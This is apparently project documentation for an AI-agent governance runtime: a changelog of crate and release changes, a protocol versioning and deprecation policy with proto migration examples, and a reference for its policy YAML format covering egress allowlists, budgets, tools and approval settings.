AAASM-918	Added `aa-devtool-saas` workspace crate (SaaS coding-agent `DevToolAdapter` for Claude.ai, ChatGPT, Cursor cloud; L1Observe governance; HMAC-SHA256 webhook signature verification; MCP allowlist advisory overlay for Claude.ai; `publish = false`)	None — new adapter crate, no changes to existing public APIs
AAASM-205	Added `aa-devtool` workspace crate (`DiscoveryService` + built-in adapters for Claude Code, Codex, GitHub Copilot, Windsurf)	None — new crate, no existing API changes; `aa-api` and `aa-cli` gain a new optional dependency on it
AAASM-949	Added RBAC role enforcement on `POST /api/v1/policies`: `CallerRole` + `MutationKind` + `PolicyScopeKind` enums and `required_role_for()` in `aa-gateway/src/policy/rbac.rs`; `PolicyWriteAuth` extractor + `PolicyAuthorizationDenied` error in `aa-api/src/auth/policy_auth.rs`; optional `scope` field on `CreatePolicyRequest`; auto-generated `docs/src/policy-rbac.md` + `.ci/check-policy-rbac-doc.sh`	`POST /api/v1/policies` now requires authentication (401 when unauthenticated) and returns 403 when the caller’s role is insufficient for the target scope; `CreatePolicyRequest` gains an optional `scope` field (defaults to `global`). Read-only endpoints unchanged.
AAASM-956	Restored `aa-devtool`, `aa-devtool-claude-code`, `aa-devtool-codex`, `aa-devtool-saas`, and `aa-devtool-windsurf` to workspace `members` (dropped by a prior merge conflict resolution); implemented `apply_settings()` and `apply_mcp_governance()` in `aa-devtool-claude-code` via new `apply.rs` module (`SettingsPathResolver` trait, atomic write, unmanaged-key merge)	None — workspace member restoration only; `apply_settings`/`apply_mcp_governance` are internal adapter implementations with no changes to existing public API surfaces
AAASM-1206	Added `[profile.release]` to workspace `Cargo.toml` (`opt-level="z"`, `lto=true`, `codegen-units=1`, `strip=true`, `panic="abort"`) — build profile change only, no version bump	None — affects binary size of release builds only; no API, protocol, or ABI changes
AAASM-1076	Added `aa-topology-integration-tests` workspace crate (in-process end-to-end test harness for the topology pipeline; `publish = false`, dev-dependencies only)	None — test-only crate, no shipped artifacts; depends on existing `aa-api` / `aa-gateway` / `aa-runtime` public surfaces with no API changes
AAASM-1448	Renamed `aa-topology-integration-tests` workspace crate to `aa-integration-tests` (in preparation for AAASM-1258 CLI subcommand coverage). Renamed `.github/workflows/topology-integration.yml` to `integration-tests.yml`.	None — test-only crate, no shipped artifacts; dev-dependencies only; no public API change
AAASM-1419	Added `CallStackNode` proto message + `repeated CallStackNode call_stack = 28` field on `AuditEvent`; added `CallStackNode` to `aa-api` `ViolationPayload::Audit` (utoipa schema regenerated); wired through dashboard `useLiveOpsStream.mapEvent`	None on `protocol/v1` — non-breaking proto field addition (default empty). SDK regeneration for `aa-ffi-python` / `aa-ffi-node` / `aa-ffi-go` tracked as separate follow-up Tasks against this revision; older SDKs continue to interoperate (the new field is ignored on decode).
AAASM-2015	Added `aa-sandbox` workspace crate (wasmtime + wasmtime-wasi host runtime scaffold for F116 ST-W tool-execution sandbox; doc-only modules `error`, `policy`, `runtime` — real WASI host wiring lands in AAASM-2017, fuel + memory-store limits in AAASM-2018)	None — new internal crate, no public API or protocol change; `aa-wasm` browser-target stub untouched
AAASM-2340	Workspace prepared for crates.io publish via `cargo-workspaces` topological order. Per-crate `publish` flags set: publishable (default) for `aa-core`, `aa-proto`, `aa-runtime`, `aa-ebpf`, `aa-ebpf-common`, `aa-proxy`, `aa-sandbox`, `aa-gateway`, `aa-cli`; `publish = false` for all `aa-devtool` (dev-tool subsystem held back from this alpha — not yet feature-complete), all `aa-ffi-` + `aa-wasm` (SDK FFI scaffolding — each language SDK repo carries its own copy and ships via PyPI / npm / Go module proxy), and `aa-api` / `conformance` / `aa-integration-tests` / `examples/` (cloud/enterprise consumers + workspace-internal tooling). All publishable crates’ path-deps gained explicit `version = "0.0.1-alpha.3"` literals so `cargo publish` manifest verification passes. `release.yml` `publish-crate` job replaced with `publish-crates` (cargo-workspaces). Sibling content bundled into crate tarballs via `_embedded/` mirrors so `cargo install aasm` ships the full product — `aa-cli/_embedded/dashboard/dist/` (real SPA, not stub), `aa-proto/_embedded/proto/` (gRPC contract), `aa-ebpf/_embedded/aa-ebpf-probes/` (BPF source, compiled at install time when nightly + bpfel target are present, otherwise graceful stubs). New `aasm sandbox run` / `aasm sandbox info` subcommands expose the WASI tool-execution sandbox (highlight ④ of the product spec) to OSS users. Source tree keeps the full `aasm` surface including `run` and `tools`; the `.ci/strip-for-publish.sh` script removes the held-back `aa-devtool` deps and the two consuming source files from the working tree right before `cargo workspaces publish` runs (driven by `strip-for-publish:begin` / `:end` markers in `aa-cli/Cargo.toml` and `aa-cli/src/commands/mod.rs`). Restores `cargo install aasm` as a supported install path. Resolves AAASM-2094 the right way (supersedes the closed AAASM-2338 / PR #840).	Behavior delta — published `aasm` binary on crates.io omits the `run` and `tools` subcommands. Local source builds (`cargo build -p aa-cli`) expose the full surface unchanged. To restore the subcommands on crates.io once dev-tool ships, remove the strip step from `release.yml` and flip the three `aa-devtool*` crates’ `publish` flags. No public Rust API, protocol, or ABI changes; new `aasm sandbox` CLI surface is additive. At 0.x.y SemVer, internal crates carry no API stability commitment; READMEs note ‘internal use only’.
AAASM-2343	Bumped workspace + 22 path-dep version literals from `0.0.1-alpha.3` to `0.0.1-alpha.4`. Fourth pre-release in the v0.0.1 dry-run series. Verifies AAASM-2340 (cargo-workspaces topological publish — first `cargo install aasm` ever), AAASM-2339 (curl smoke channel gated with `if: false`), and AAASM-2336 (notify-downstream → node-sdk + python-sdk repository_dispatch, supersedes AAASM-2328 retry workaround). Companion python-sdk listener AAASM-2342 lands in the same release cycle.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2461	Bumped workspace + 22 path-dep version literals from `0.0.1-alpha.4` to `0.0.1-alpha.5`. Fifth pre-release in the v0.0.1 dry-run series. Validates the full release pipeline end-to-end with all alpha-4 recovery fixes baked in: AAASM-2346 (`cargo workspaces publish --allow-dirty`), AAASM-2455 / AAASM-2457 (smoke matrix restructure), AAASM-2456 (RUNBOOK + `release-readiness.sh` + per-channel aggregator), plus SDK companions node-sdk#67 (AAASM-2344) and python-sdk#74/#75/#76 (AAASM-2345 / AAASM-2459 / AAASM-2460). On crates.io, `aa-core` re-publishes at `0.0.1-alpha.5` alongside its existing `0.0.1-alpha.4` row from the partial alpha-4 publish; the other 8 crates publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2767	Bumped workspace + 35 path-dep version literals from `0.0.1-alpha.5` to `0.0.1-alpha.6`. Sixth pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the two alpha-5 recovery fixes baked in: AAASM-2463 commit 1 (PR #871 — `--no-verify` on `cargo workspaces publish`, bypassing the `cargo publish --verify` source-mutation guard that `aa-ebpf/build.rs`’s `Cargo.toml.embedded` rename tripped) and AAASM-2463 commit 2 (PR #871 — removed the `smoke-test:` job that raced `publish-crates` and the homebrew tap PR merge). On crates.io, `aa-core` / `aa-proto` / `aa-ebpf-common` re-publish at `0.0.1-alpha.6` alongside their existing `0.0.1-alpha.5` rows from the partial alpha-5 publish; the other 6 crates (`aa-ebpf`, `aa-runtime`, `aa-proxy`, `aa-sandbox`, `aa-gateway`, `aa-cli`) publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2786	Bumped workspace + 35 path-dep version literals from `0.0.1-alpha.6` to `0.0.1-alpha.7`. Seventh pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the AAASM-2775 strip-for-publish fix baked into master (PR #1021 — wrapped `aa-integration-tests/Cargo.toml`’s `audit-consumer = ["aa-gateway/audit-consumer"]` feature forward in `strip-for-publish:begin audit-consumer` / `:end` markers and added the file to `MARKED_FILES` in `.ci/strip-for-publish.sh`; the alpha-6 `publish-crates` failed at the cargo-workspaces resolver because the workspace graph still referenced the stripped feature). Also benefits from two companion SDK-workflow settings fixes applied via API: org-level “Allow GitHub Actions to create/approve PRs” enabled (unblocks node-sdk’s docs-version PR step), and go-sdk’s `github-pages` env adds a `v*` tag deployment policy (unblocks Pages deployment on tag pushes). On crates.io, `aa-core` / `aa-proto` / `aa-ebpf-common` re-publish at `0.0.1-alpha.7` alongside their existing `0.0.1-alpha.5` rows (the alpha-6 retries failed); the other 6 crates publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2805	Bumped workspace + 35 historical path-dep version literals AND 8 newly added storage/cache path-dep version literals (AAASM-2797 / PR #1024) from `0.0.1-alpha.7` to `0.0.1-alpha.8`. Eighth pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the AAASM-2797 fix baked into master — 5 storage/cache crates (`aa-storage`, `aa-storage-memory`, `aa-storage-redis`, `aa-storage-sqlite-buffer`, `aa-cache`) had path-deps without the `version = "..."` literal that cargo publish demands. alpha-7’s `publish-crates` died after publishing only `aa-core@0.0.1-alpha.7` because of this latent bug. On crates.io, all 14 publishable crates are expected to land for the first time end-to-end: the 9 historical (re-publish at alpha-8 alongside existing rows) plus the 5 storage/cache crates (publish for the first time ever). Still-open follow-up: Homebrew `brew install + test (macOS)` silent-SIGKILL investigation (the AAASM-2792 revert didn’t fix it; `--release` post-AAASM-2575 is the fast profile, not size-optimized; suspect is a new transitive dep added since alpha-5 such as redis 1.2 / deadpool-redis 0.23 via aa-storage-redis).	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2849	Bumped workspace + 43 path-dep version literals from `0.0.1-alpha.8` to `0.0.1-alpha.9`. Ninth pre-release in the v0.0.1 dry-run series. First coordinated release after the AAASM-2851 SDK release decoupling chapter — validates that the `repository_dispatch` fan-out still works end-to-end after the restructure of `release-node.yml` (publish_mode gating, dry-run input, Resolve refactor) and `release-python.yml` (resolve job, sync-version composite action rename). Carries agent-assembly docs polish (AAASM-2199, 2827, 2833, 2841, 2858) and drives `@agent-assembly/sdk@0.0.1-alpha.9` (full AAASM-2851 chain + AAASM-2842 public GatewayClient + AAASM-2870 README polish) and `agent-assembly==0.0.1a9` (symmetric python-sdk content + AAASM-2863 PEP 440 test + AAASM-2868 docs CI gate + AAASM-2869 runbook) downstream via repository_dispatch. On crates.io, all 14 publishable crates re-publish at `0.0.1-alpha.9` alongside their existing `0.0.1-alpha.8` rows.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2951	Bumped workspace + 16 path-dep version literals from `0.0.1-alpha.9` to `0.0.1-beta.1`. First beta-channel pre-release in the v0.0.1 series — promotes the pre-release channel up from alpha after the alpha-1 → alpha-9 dry-run series stabilised every release channel. Coordinated release across agent-assembly + python-sdk + node-sdk + go-sdk; drives `@agent-assembly/sdk@0.0.1-beta.1`, `agent-assembly==0.0.1b1`, and `github.com/ai-agent-assembly/go-sdk@v0.0.1-beta.1` downstream. Carries the AAASM-2934 SDK Examples documentation chapter (multi-page Examples sections in the node/python/go SDK docs + an agent-assembly core-docs Examples pointer). On crates.io, all 14 publishable crates re-publish at `0.0.1-beta.1` alongside their existing `0.0.1-alpha.9` rows.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-3004	Bumped workspace + 16 path-dep version literals from `0.0.1-beta.1` to `0.0.1-beta.2`. Second pre-release in the v0.0.1 beta channel — a forward-roll cut on top of `0.0.1-beta.1` (no channel promotion, no scope expansion) carrying the AAASM-3000 IPC deadlock fix in `aa-sdk-client` (event reporting is now fire-and-forget, closing the deadlock against a runtime that doesn’t ack) plus the AAASM-2959 release-tooling sync that keeps `aa-ffi-python` and `aa-ffi-node` `Cargo.lock` consistent with the bumped `aa-sdk-client` revision. Coordinated release across agent-assembly + python-sdk + node-sdk + go-sdk; drives `@agent-assembly/sdk@0.0.1-beta.2`, `agent-assembly==0.0.1b2`, and `github.com/ai-agent-assembly/go-sdk@v0.0.1-beta.2` downstream. On crates.io, all 14 publishable crates re-publish at `0.0.1-beta.2` alongside their existing `0.0.1-beta.1` rows.	None — pre-release version bump + a behaviour-preserving deadlock fix on the SDK event-report path (the prior code blocked on an ack that the runtime didn’t send; consumers that already worked still work). AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2372	Added `aa-storage-redis` workspace crate (Redis L2 shared-cache driver implementing `SessionStore`, `RateLimitCounter`, and `PolicyStore` from `aa-core::storage`; `redis` 1.2 + `deadpool-redis` 0.23 pooling; `RateLimitCounter` uses an atomic Lua `INCRBY`+`EXPIRE` script). No version change.	None — new driver crate, no changes to existing public API surface. `xxhash-rust` BSL-1.0 (transitive via `redis`) is already allow-listed in `deny.toml`.
AAASM-2369	Added `aa-storage-postgres` workspace crate (L3 primary PostgreSQL storage driver — ships sqlx migrations for the four MVP tables `orgs`/`agents`/`policies`/`audit_logs` and a `[storage.postgres]` connection-pool config; `publish = false` until the storage-driver subsystem is feature-complete). The `aa_core::storage` trait impls (`PgPolicyStore` / `PgAuditSink` / `PgCredentialStore` / `PgLifecycleStore`) land in AAASM-2370. No version change.	None — new internal driver crate; no existing public API, protocol, or ABI change
AAASM-2575	Split the default `[profile.release]` into a fast build (`opt-level=2`, `lto="thin"`, `codegen-units=16`; `strip` + `panic="abort"` unchanged) and added a size-optimized `[profile.dist]` (inherits `release`; `opt-level="z"`, fat `lto`, `codegen-units=1`). `release.yml` now ships the binary with `--profile dist`. Build-profile change only, no version bump.	None — affects build speed and which profile produces the shipped binary; `dist` reproduces the previous size-optimized output. No API, protocol, or ABI change.
AAASM-2555	Added a `[workspace.dependencies]` table to the root `Cargo.toml` centralizing third-party crates shared by ≥2 members, and converted those members to `dep = { workspace = true }` (single source of version truth). Pure manifest refactor — `Cargo.lock` byte-for-byte unchanged and `cargo tree -d` identical to the prior revision (108 duplicate nodes); no version bump. Single-member and intentionally-pinned crates (e.g. `rusqlite` per AAASM-2374) stay declared locally.	None — no version, protocol, or ABI change; resolved dependency graph is identical, so runtime behavior is unchanged
AAASM-2588	Added `[profile.dev]` (`debug="line-tables-only"`) and `[profile.dev.package."*"]` (`opt-level=1`, `debug=false`) to tune dev/test build time, plus an opt-in (commented) `.cargo/config.toml` faster-linker template and a `CONTRIBUTING.md` section. Raised the `integration-tests` job `timeout-minutes` 20→30 to absorb the slightly heavier optimized-deps build. Build-config change only, no version bump.	None — affects local/CI build speed and dev-build debuginfo verbosity only; no API, protocol, or ABI change.
AAASM-2623	Added `aa-sdk-client` workspace crate (Story AAASM-2570 — the shared, FFI-agnostic SDK runtime-client: UDS transport, IPC wire codec, `AssemblyClient` lifecycle, and advisory non-authoritative credential preflight, extracted from `aa-ffi-python`). Scaffold only in this PR (`publish = false` until AAASM-2559 makes the shared crates pinnable); modules land in AAASM-2624/2625/2626. `aa-ffi-python` is untouched — its migration onto this crate is AAASM-2561.	None — new internal crate, no existing public API, protocol, or ABI change
AAASM-2646	Removed the fat `aa-ffi-python` + `aa-ffi-node` members from root `Cargo.toml` and deleted the crates (Epic AAASM-2552 final story). The thin Node/Python shims now live in the sibling `node-sdk` / `python-sdk` repos on the pinned `aa-sdk-client` (AAASM-2560 / AAASM-2561); `aa-ffi-go` (C-ABI staticlib artifact consumed by go-sdk) and `aa-sdk-client` are retained, as is `workspace.exclude = ["node-sdk"]` (the `e2e_sdk_node` tests still build the sibling thin shim). Shrinks `cargo build --workspace` by dropping the pyo3 / napi / napi-derive / napi-build dep subtrees.	None — workspace member removal only; the Python/Node/Go SDKs ship from their own repos and keep their versions + protocol/v1 compatibility. No aa-runtime version, protocol, or ABI change
AAASM-2703	Removed the `aa-ffi-go` member from root `Cargo.toml`, deleted the crate, and deleted its `ffi-go-staticlib.yml` build workflow (Epic AAASM-2552). The thin Go cgo shim now lives in the sibling `go-sdk` repo (`native/aa-ffi-go`) on the pinned `aa-sdk-client` (AAASM-2704), matching the Node/Python model — the monorepo no longer hosts any FFI shim. Amends ADR 0002 (which had kept `aa-ffi-go` in the workspace).	None — workspace member removal only; the Go SDK ships from its own repo and keeps its version + protocol/v1 compatibility. No aa-runtime version, protocol, or ABI change
PR #1059 (Dependabot)	Bumped the workspace `tower-http` dependency from `0.6.11` to `0.7.0` in root `Cargo.toml` (HTTP middleware used by `aa-api` / `aa-gateway`). Compiles and passes the full workspace test suite + clippy unchanged. A transitive `tower-http 0.6` remains in `Cargo.lock` via an upstream dependency; both coexist. No version bump.	None — internal third-party dependency bump; no public API, protocol, or ABI change

Last updated: 2026-06-16 by Chisanan232

Protocol versioning policy

Use this page to decide how a protocol change must be versioned before you ship it. It defines the versioning scheme, the rules for classifying a change as breaking or non-breaking, and the deprecation lifecycle. Every change to proto schemas, JSON schemas, IPC framing, and wire formats is governed by this policy.

The short version: add fields and RPCs freely (MINOR); never remove, rename, or retype an existing field without a MAJOR bump and a migration guide.

Versioning scheme

The protocol uses Semantic Versioning (MAJOR.MINOR.PATCH):

Component	Meaning
`MAJOR`	Breaking change — existing SDKs must be updated to remain compatible
`MINOR`	Non-breaking addition — new fields, new RPCs, new enum values (backward compatible)
`PATCH`	Non-breaking fix — documentation corrections, description updates, no wire format change

The current protocol version is protocol/v1 (pre-stable: v0.0.1).

Change classification

Non-breaking changes (MINOR or PATCH)

These changes can be made without requiring SDK updates:

Change	Classification	Reason
Add an optional field to a message	MINOR	Existing decoders ignore unknown fields (proto3)
Add a new RPC method to a service	MINOR	Existing clients simply don’t call it
Add a new enum value	MINOR	Unknown enum values fall back to `_UNSPECIFIED = 0`
Add a new service	MINOR	Existing clients don’t depend on it
Reword a field description (not the field itself)	PATCH	No wire format change
Fix a typo in a comment or doc string	PATCH	No wire format change
Tighten a JSON Schema description	PATCH	No wire format change

Breaking changes (MAJOR)

These changes require a MAJOR version bump and a migration guide:

Change	Classification	Reason
Remove a field from a message	MAJOR	Existing encoders/decoders break
Rename a field	MAJOR	Field number stays but name change breaks JSON/gRPC-gateway
Change a field’s type	MAJOR	Wire encoding changes
Change a field number	MAJOR	Proto3 wire encoding is field-number based
Remove an RPC method	MAJOR	Existing callers get `UNIMPLEMENTED` errors
Remove an enum value	MAJOR	Existing code holding that value breaks
Add a required field	MAJOR	Existing messages missing the field become invalid
Change a JSON Schema `type` constraint	MAJOR	Existing valid documents become invalid
Narrow a JSON Schema constraint (e.g. add `minLength`)	MAJOR	Previously valid values may now fail validation
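
The two classification tables above amount to a lookup from change kind to required bump, with a release taking the largest bump among its changes. The sketch below encodes a subset of the rows. The enum and function names are hypothetical and nothing here is part of the project's tooling.

```rust
/// Version component a change forces. Declaration order gives Patch < Minor < Major.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Bump {
    Patch,
    Minor,
    Major,
}

/// A subset of the change kinds listed in the classification tables.
#[derive(Debug, Clone, Copy)]
pub enum Change {
    EditDescription,
    AddOptionalField,
    AddRpc,
    AddEnumValue,
    AddService,
    RemoveField,
    RenameField,
    ChangeFieldType,
    ChangeFieldNumber,
    RemoveRpc,
    RemoveEnumValue,
    AddRequiredField,
    NarrowJsonSchema,
}

/// Maps one change to the bump the policy requires for it.
pub fn required_bump(change: Change) -> Bump {
    use Change::*;
    match change {
        EditDescription => Bump::Patch,
        AddOptionalField | AddRpc | AddEnumValue | AddService => Bump::Minor,
        RemoveField | RenameField | ChangeFieldType | ChangeFieldNumber | RemoveRpc
        | RemoveEnumValue | AddRequiredField | NarrowJsonSchema => Bump::Major,
    }
}

/// A release needs the largest bump among its changes; `None` if there are none.
pub fn release_bump(changes: &[Change]) -> Option<Bump> {
    changes.iter().map(|c| required_bump(*c)).max()
}
```

Because the `match` is exhaustive, adding a new `Change` variant forces a decision about its classification at compile time.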

Deprecation lifecycle

Before a breaking change is introduced, the affected field, method, or value must go through a formal deprecation period:

Deprecated in vX.Y  →  Removed no earlier than v(X+2).0

Steps

Deprecate — Mark the item as deprecated in the proto or JSON Schema with a deprecated annotation and a description explaining what to use instead. Bump MINOR version.
Announce — Add an entry to CHANGELOG.md under Deprecated. Notify SDK maintainers.
Support period — The deprecated item remains fully functional for at least two MAJOR versions after the deprecating release.
Remove — Remove the item in a future MAJOR release (no earlier than v(X+2).0). Add a migration guide. Update CHANGELOG.md under Removed.
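
The removal rule is simple arithmetic on the MAJOR component. A small sketch, assuming versions are passed as plain `X.Y` strings (the helper names are hypothetical):

```python
def earliest_removal(deprecated_in):
    """Map 'X.Y' to the first release allowed to remove the item: '(X+2).0'."""
    major = int(deprecated_in.split(".")[0])
    return f"{major + 2}.0"


def may_remove(deprecated_in, release):
    """True when `release` is late enough to drop an item deprecated in `deprecated_in`."""
    release_major = int(release.split(".")[0])
    return release_major >= int(deprecated_in.split(".")[0]) + 2
```

For an item deprecated in v1.3, `earliest_removal("1.3")` gives `"3.0"`, and `may_remove("1.3", "2.4")` is false.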

Runtime backward compatibility

Runtime N must support SDKs speaking protocol N-1.

This means an aa-runtime at protocol v2.x must continue to accept connections from SDKs still using protocol v1.x. SDKs have a two-major-version window to migrate before a runtime drops support for the older protocol.
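
As a sketch of the N / N-1 rule, the set of protocol majors a runtime has to accept can be computed as follows. The function name is hypothetical, and it assumes protocol majors start at 1:

```python
def runtime_must_support(runtime_major):
    """Protocol majors that a runtime at `runtime_major` has to accept."""
    if runtime_major < 1:
        raise ValueError("protocol majors start at 1")
    # Current major plus the previous one, when a previous one exists.
    return [m for m in (runtime_major - 1, runtime_major) if m >= 1]
```

`runtime_must_support(2)` yields `[1, 2]`, and `runtime_must_support(3)` yields `[2, 3]`, at which point support for protocol v1 may be dropped.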

Example: deprecating a field

// Before (v1.2 — field is still used)
message AgentId {
  string org_id   = 1;
  string team_id  = 2;
  string agent_id = 3;  // original field name
}

// After (v1.3 — field deprecated, replacement added)
message AgentId {
  string org_id   = 1;
  string team_id  = 2;
  string agent_id = 3 [deprecated = true];  // deprecated: use `id` instead (removed in v3.0)
  string id       = 4;  // replacement field
}

CHANGELOG entry at v1.3:

### Deprecated
- `AgentId.agent_id` — use `AgentId.id` instead. Will be removed in v3.0.

Example migration guide — `AgentId.agent_id` → `AgentId.id`

Breaking change introduced in: protocol/v3.0
Deprecated since: protocol/v1.3
Affected SDK versions: All SDKs using AgentId.agent_id
Estimated migration effort: Low

What changed

The field AgentId.agent_id (field number 3) was removed. Use AgentId.id (field number 4) instead. The semantic meaning is identical — the field carries the agent’s own identifier (DID).

Before (protocol/v1.x — v2.x)

Proto encoding:

AgentId {
  org_id:   "acme"
  team_id:  "platform"
  agent_id: "did:key:z6Mk..."   // field 3
}

Python SDK:

agent_id = AgentId(org_id="acme", team_id="platform", agent_id="did:key:z6Mk...")

After (protocol/v3.0+)

Proto encoding:

AgentId {
  org_id:  "acme"
  team_id: "platform"
  id:      "did:key:z6Mk..."    // field 4
}

Python SDK:

agent_id = AgentId(org_id="acme", team_id="platform", id="did:key:z6Mk...")

Migration steps

Search your codebase for all usages of AgentId.agent_id (or the SDK-language equivalent).
Replace each with AgentId.id.
Run your SDK’s conformance test suite against an aa-runtime at protocol/v3.0.
Deploy the updated SDK before upgrading aa-runtime past v2.x (runtime v2.x still supports protocol/v1 per the backward compatibility rule).

Runtime protocol	Must support
protocol/v1	protocol/v1 only (first version)
protocol/v2	protocol/v1, protocol/v2
protocol/v3	protocol/v2, protocol/v3 (v1 support may be dropped)

For the blank template to copy when writing a new migration guide, see docs/migration/template.md.

Last updated: 2026-06-11 by Chisanan232

Policy YAML Reference

A complete reference for the governance policy document the gateway loads, validates, and enforces. Every field below is grounded in the policy engine’s own types (aa-gateway/src/policy/) and the shared core (aa-core). Validate any file locally before applying it:

aasm policy validate path/to/policy.yaml

Validation prints Policy is valid: <path> and exits 0 on success. Hard constraint violations print error: <field>: <message> and exit 1. Unrecognised keys are warnings, not errors — the file still validates, but the unknown key is ignored at runtime, so a typo’d field silently does nothing. Treat warnings as bugs.

Document formats

A policy may be written in either of two equivalent shapes.

Envelope format (recommended)

A Kubernetes-style wrapper. metadata.name and metadata.version are surfaced in tooling; the actual policy lives under spec:.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: my-policy
  version: "1.0.0"
  description: Optional free text.
spec:
  budget:
    daily_limit_usd: 20.0

Flat format

The same content with no wrapper — every section sits at the top level. There is no metadata, so name and version are absent.

version: "1.0"
budget:
  daily_limit_usd: 20.0

The validator auto-detects the format: if a top-level spec: key is present it parses the envelope, otherwise it parses the flat form. The field tables below describe the policy body (the content of spec:, or the whole document in flat form).
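
The detection rule can be sketched in a few lines of Python. This assumes the YAML has already been parsed into a mapping by a YAML library of your choice; `policy_body` is a hypothetical helper, not the validator's own code:

```python
def policy_body(document):
    """Return (body, metadata) from an already-parsed policy mapping."""
    if "spec" in document:                      # envelope format
        return document["spec"], document.get("metadata", {})
    return document, {}                         # flat format: no metadata


envelope = {
    "apiVersion": "agent-assembly/v1",
    "kind": "Policy",
    "metadata": {"name": "my-policy", "version": "1.0.0"},
    "spec": {"budget": {"daily_limit_usd": 20.0}},
}
flat = {"version": "1.0", "budget": {"daily_limit_usd": 20.0}}
```

Both documents yield a body containing the same `budget` section; only the envelope carries a `name`.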

Top-level fields

Field	Type	Default	Example
`version`	string	(none)	`version: "1.0"`
`scope`	string	`global`	`scope: team:platform`
`approval_timeout_secs`	integer > 0	`300`	`approval_timeout_secs: 600`
`network`	section	(omitted → unrestricted)	see network
`schedule`	section	(omitted → always active)	see schedule
`budget`	section	(omitted → no cap)	see budget
`data`	section	(omitted → no scan rules)	see data
`tools`	map	(empty)	see tools
`capabilities`	section	(omitted)	see capabilities
`approval`	section	(omitted)	see approval

scope accepts one of: global, org:<id>, team:<id>, agent:<uuid>, or tool:<name>. The cascade evaluates policies in Global → Org → Team → Agent → Tool order, most-restrictive-wins. An agent: scope requires a valid hyphenated UUID; a team:/org:/tool: identifier must not be empty. Any other shape is a validation error.
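
A rough Python rendering of those scope rules, useful for pre-checking values in your own tooling. The function name and error wording are hypothetical; the engine's real messages may differ:

```python
import re

# Hyphenated 8-4-4-4-12 hexadecimal UUID.
_UUID = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Evaluation order of the cascade, broadest scope first.
CASCADE = ["global", "org", "team", "agent", "tool"]


def parse_scope(scope):
    """Return (kind, identifier) or raise ValueError for an invalid scope."""
    if scope == "global":
        return ("global", None)
    kind, sep, ident = scope.partition(":")
    if not sep or kind not in CASCADE[1:]:
        raise ValueError(f"unrecognised scope shape: {scope!r}")
    if not ident:
        raise ValueError(f"{kind}: identifier must not be empty")
    if kind == "agent" and not _UUID.fullmatch(ident):
        raise ValueError("agent: scope requires a hyphenated UUID")
    return (kind, ident)
```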

Complete example policy

A single policy exercising every section. This validates cleanly.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: complete-example
  version: "1.0.0"
  description: Demonstrates every policy section.
spec:
  scope: team:platform
  approval_timeout_secs: 300

  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"

  schedule:
    active_hours:
      start: "09:00"
      end: "18:00"
      timezone: "Asia/Taipei"

  budget:
    daily_limit_usd: 25.0
    monthly_limit_usd: 500.0
    timezone: "Asia/Taipei"
    action_on_exceed: deny

  data:
    credential_action: redact_only
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"

  capabilities:
    allow:
      - file_read
      - network_outbound
      - mcp_tool:git
    deny:
      - terminal_exec

  approval:
    timeout_seconds: 600
    escalation_role: org-admin

  tools:
    read_file:
      allow: true
      limit_per_hour: 120
    write_file:
      allow: true
      requires_approval_if: "path starts_with \"/etc\""
    shell:
      allow: false

`network`

Controls outbound (egress) connections. Backed by NetworkPolicy.

Field	Type	Default	Example
`allowlist`	list of glob strings	`[]`	`allowlist: ["api.openai.com"]`

Glob pattern semantics

The matcher (aa_core::policy::is_host_allowed_by_egress_allowlist) supports exactly three pattern shapes:

Pattern	Matches	Does not match
`api.openai.com`	exact host, case-insensitive	`chat.openai.com`, `openai.com`
`*.openai.com`	any sub-domain at any depth: `api.openai.com`, `a.b.openai.com`	the bare apex `openai.com`; attacker suffixes like `evilopenai.com`
`*`	every host (escape hatch)	—

Matching is case-insensitive (DNS labels are case-insensitive per RFC 4343). The leftmost-label wildcard *. requires at least one label before the suffix, so *.openai.com deliberately excludes the bare openai.com — list both if you need the apex too.

Default behavior

No network: section → egress is unrestricted (default-open). The caller’s posture wins.
network: present but allowlist empty or omitted → also unrestricted. An empty list means “no restriction”, not “deny all”. To deny by default, list only the hosts you trust — anything not matched is then denied.

An allowlist entry that is empty or whitespace-only is a validation error (network.allowlist[i]: allowlist entry must not be empty).
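
The three pattern shapes and the default-open rule can be sketched as follows. This is an illustrative Python rendering of the behaviour described above, not the `aa_core` implementation, and `host_allowed` is a hypothetical name:

```python
def host_allowed(host, allowlist):
    """Check `host` against an egress allowlist using the three documented shapes."""
    if not allowlist:                 # omitted or empty list: unrestricted
        return True
    host = host.lower()
    for pattern in allowlist:
        pattern = pattern.lower()
        if pattern == "*":            # escape hatch: every host
            return True
        if pattern.startswith("*."):
            suffix = pattern[1:]      # "*.openai.com" -> ".openai.com"
            # At least one label must precede the suffix, so the apex is excluded.
            if host.endswith(suffix) and len(host) > len(suffix):
                return True
        elif host == pattern:         # exact host
            return True
    return False
```

Keeping the leading dot in the suffix is what rejects look-alike hosts such as `evilopenai.com`: they end in `openai.com` but not in `.openai.com`.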

`tools`

Per-tool allow/deny, rate limiting, and approval gating. A map keyed by tool name; each value is a ToolPolicy.

Field	Type	Default	Example
`allow`	bool	`true`	`allow: false`
